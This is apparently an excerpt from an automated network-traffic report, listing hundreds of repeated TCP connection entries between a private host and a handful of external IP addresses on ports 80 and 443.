          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
